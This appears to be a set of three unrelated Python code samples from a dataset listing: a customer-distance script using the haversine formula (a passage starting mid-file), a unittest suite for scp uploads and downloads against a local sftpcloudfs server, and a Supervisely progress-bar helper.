with open(filename) as customer_data:
for line in customer_data:
data = json.loads(line)
customer_list.append(
Customer(
data['user_id'],
data['name'],
data['latitude'],
data['longitude']
)
)
return customer_list
class DistanceCalculator:
@staticmethod
def kmFromBase(customer_latitude, customer_longitude):
"""haversine formula, negative values south and west"""
base_latitude = 53.3381985
base_longitude = -6.2592576
base_lat_rad = math.radians(base_latitude)
customer_lat_rad = math.radians(customer_latitude)
delta_lat = math.radians(customer_latitude - base_latitude)
delta_lng = math.radians(customer_longitude - base_longitude)
radius_of_earth = 6371 # km
chord_calculation = (
math.sin(delta_lat / 2) * math.sin(delta_lat / 2) +
math.cos(base_lat_rad) * math.cos(customer_lat_rad) *
math.sin(delta_lng / 2) * math.sin(delta_lng / 2)
)
angular_distance = (
2 * math.atan2(
math.sqrt(chord_calculation), math.sqrt(1 - chord_calculation)
)
)
distance = radius_of_earth * angular_distance
return distance
def main():
#
# parse arguments
arg_parser = argparse.ArgumentParser(description='Print a list of customers within 100km from a supplied data file')
arg_parser.add_argument(
'datafile',
type=str,
help='a file comprising of customer data, one json-formatted customer string per line'
)
arguments = arg_parser.parse_args()
def bad_exit(message, error_code):
print message
sys.exit(error_code)
#
# parse customer data file
try:
customer_list = Parser.parse(arguments.datafile)
except IOError:
bad_exit("File [{}] not found".format(arguments.datafile), 1)
except ValueError:
bad_exit("File [{}] contains malformed data".format(arguments.datafile), 1)
if not customer_list:
bad_exit("No customer data in file [{}]".format(arguments.datafile), 1)
#
# sort customers and calculate distance
for customer in sorted(customer_list):
try:
customer_distance = DistanceCalculator.kmFromBase(
customer.latitude, customer.longitude
)
except TypeError:
bad_exit(
"Customer data is wrong type; was expecting int, "
"got [{}] and [{}]".format(customer.latitude, customer.longitude),
1
)
if (customer_distance < 100.0):
print "{0:>3} - {1:<18}".format(
customer.user_id, customer.name
)
if __name__ == "__main__":
main()
|
#!/usr/bin/python
import unittest
import os
import sys
from swiftclient import client
import paramiko
hostname = "127.0.0.1"
port = 8022
# setup logging
#paramiko.util.log_to_file('test_sftpd.log')
class SftpcloudfsTest(unittest.TestCase):
''' FTP Cloud FS main test '''
def setUp(self):
if not all(['OS_API_KEY' in os.environ,
'OS_API_USER' in os.environ,
'OS_AUTH_URL' in os.environ,
]):
print "env OS_API_USER/OS_API_KEY/OS_AUTH_URL not found."
sys.exit(1)
self.username = os.environ['OS_API_USER']
self.api_key = os.environ['OS_API_KEY']
self.tenant = os.environ.get('OS_API_TENANT')
self.auth_url = os.environ['OS_AUTH_URL']
self.container = "sftpcloudfs_testing"
connection_parameters = {
"user": self.username,
"key": self.api_key,
"authurl": self.auth_url,
}
if self.tenant:
connection_parameters['auth_version'] = 2
connection_parameters['tenant_name'] = self.tenant
self.conn = client.Connection(**connection_parameters)
self.conn.put_container(self.container)
self.transport = paramiko.Transport((hostname, port))
self.transport.connect(
username=self.username,
password=self.api_key,
# hostkey=hostkey
)
self.channel = self.transport.open_session()
self.container = "sftpcloudfs_testing"
def test_setup_and_teardown(self):
pass
def test_file_upload(self):
# Source:
# https://blogs.oracle.com/janp/entry/how_the_scp_protocol_works
# Example 1
self.channel.exec_command('scp -t /%s/foo' % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("C0644 6 foo\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("Hello\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
headers, content = self.conn.get_object(self.container, 'foo')
self.assertEquals(content, 'Hello\n')
def test_file_upload_to_dir(self):
self.channel.exec_command('scp -td /%s' % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("C0644 6 test\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("Hello\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
headers, content = self.conn.get_object(self.container, 'test')
self.assertEquals(content, 'Hello\n')
def test_dir_upload(self):
# Source:
# https://blogs.oracle.com/janp/entry/how_the_scp_protocol_works
# Example 1
self.channel.exec_command('scp -tr /%s/foodir' % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("D0644 0 foodir\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("C0644 6 test\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("Hello\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("E\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
headers, content = self.conn.get_object(self.container, 'foodir/test')
self.assertEquals(content, 'Hello\n')
def download_file(self):
self.conn.put_object(self.container, 'bar', 'Hello\n')
self.channel.exec_command('scp -f /%s/bar' % self.container)
self.channel.send('\000' * 3)
response = self.channel.read()
self.assertEquals(response, 'C0644 6 bar\nHello\n')
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
def download_dir(self):
self.conn.put_object(self.container, 'foo/bar', 'Hello\n')
self.channel.exec_command('scp -fr /%s/foo' % self.container)
self.channel.send('\000' * 5)
response = self.channel.read()
self.assertEquals(
response,
'D0644 0 foo\n'
'C0644 6 bar\nHello\n'
'E\n'
)
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
def test_file_upload_invalid_size(self):
self.channel.exec_command('scp -t /%s/foo' % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("C0644 not_an_integer test\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\001")
def test_file_upload_error_disconnect(self):
self.channel.exec_command('scp -t /%s/foo' % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("C0644 not_an_integer foo\n")
# shouldn't raise and exception on the server
# FIXME: test that it doesn't happen!
def test_file_upload_unicode(self):
self.channel.exec_command(u'scp -t /%s/Smiley\u263a\ file'.encode("utf-8") % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall(u"C0644 6 Smiley\u263a file\n".encode("utf-8"))
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("Hello\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
headers, content = self.conn.get_object(self.container, u'Smiley\u263a file')
self.assertEquals(content, 'Hello\n')
def test_dir_upload_unicode(self):
self.channel.exec_command(u'scp -tr /%s/Smiley\u263a\ dir'.encode("utf-8") % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall(u"D0644 6 Smiley\u263a dir\n".encode("utf-8"))
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("C0644 6 test\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("Hello\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("E\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
headers, content = self.conn.get_object(self.container, u'Smiley\u263a dir/test')
self.assertEquals(content, 'Hello\n')
def test_file_upload_like_scp(self):
self.channel.exec_command('scp -t -- /%s/file with spaces.txt' % self.container)
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall(u"C0644 6 file with spaces.txt\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
self.channel.sendall("Hello\n")
ack = self.channel.recv(1)
self.assertEquals(ack, "\000")
exit_status = self.channel.recv_exit_status()
self.assertEquals(exit_status, 0)
tail = self.channel.recv(1)
self.assertEquals(tail, '')
headers, content = self.conn.get_object(self.container, 'file with spaces.txt')
self.assertEquals(content, 'Hello\n')
def tearDown(self):
self.channel.close()
self.transport.close()
# Delete eveything from the container using the API
_, fails = self.conn.get_container(self.container)
for obj in fails:
self.conn.delete_object(self.container, obj["name"])
self.conn.delete_container(self.container)
if __name__ == '__main__':
unittest.main()
|
import math
import supervisely_lib as sly
class SlyProgress:
def __init__(self, api, task_id, pbar_element_name):
self.api = api
self.task_id = task_id
self.pbar_element_name = pbar_element_name
self.pbar = None
def refresh_params(self, desc, total, is_size=False):
self.pbar = sly.Progress(desc, total, is_size=is_size)
# if total > 0:
self.refresh_progress()
# self.reset_params()
def refresh_progress(self):
curr_step = math.floor(self.pbar.current * 100 /
self.pbar.total) if self.pbar.total != 0 else 0
fields = [
{"field": f"data.{self.pbar_element_name}", "payload": curr_step},
{"field": f"data.{self.pbar_element_name}Message", "payload": self.pbar.message},
{"field": f"data.{self.pbar_element_name}Current", "payload": self.pbar.current_label},
{"field": f"data.{self.pbar_element_name}Total", "payload": self.pbar.total_label},
{"field": f"data.{self.pbar_element_name}Percent", "payload":
curr_step},
]
self.api.task.set_fields(self.task_id, fields)
def reset_params(self):
fields = [
{"field": f"data.{self.pbar_element_name}", "payload": None},
{"field": f"data.{self.pbar_element_name}Message", "payload": None},
{"field": f"data.{self.pbar_element_name}Current", "payload": None},
{"field": f"data.{self.pbar_element_name}Total", "payload": None},
{"field": f"data.{self.pbar_element_name}Percent", "payload": None},
]
self.api.task.set_fields(self.task_id, fields)
def next_step(self):
self.pbar.iter_done_report()
self.refresh_progress()
def upload_monitor(self, monitor, api: sly.Api, task_id, progress: sly.Progress):
if progress.total == 0:
progress.set(monitor.bytes_read, monitor.len, report=False)
else:
progress.set_current_value(monitor.bytes_read, report=False)
self.refresh_progress()
def update_progress(self, count, api: sly.Api, task_id, progress: sly.Progress):
# hack slight inaccuracies in size convertion
count = min(count, progress.total - progress.current)
progress.iters_done(count)
if progress.need_report():
progress.report_progress()
self.refresh_progress()
def set_progress(self, current, api: sly.Api, task_id, progress: sly.Progress):
old_value = progress.current
delta = current - old_value
self.update_progress(delta, api, task_id, progress) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.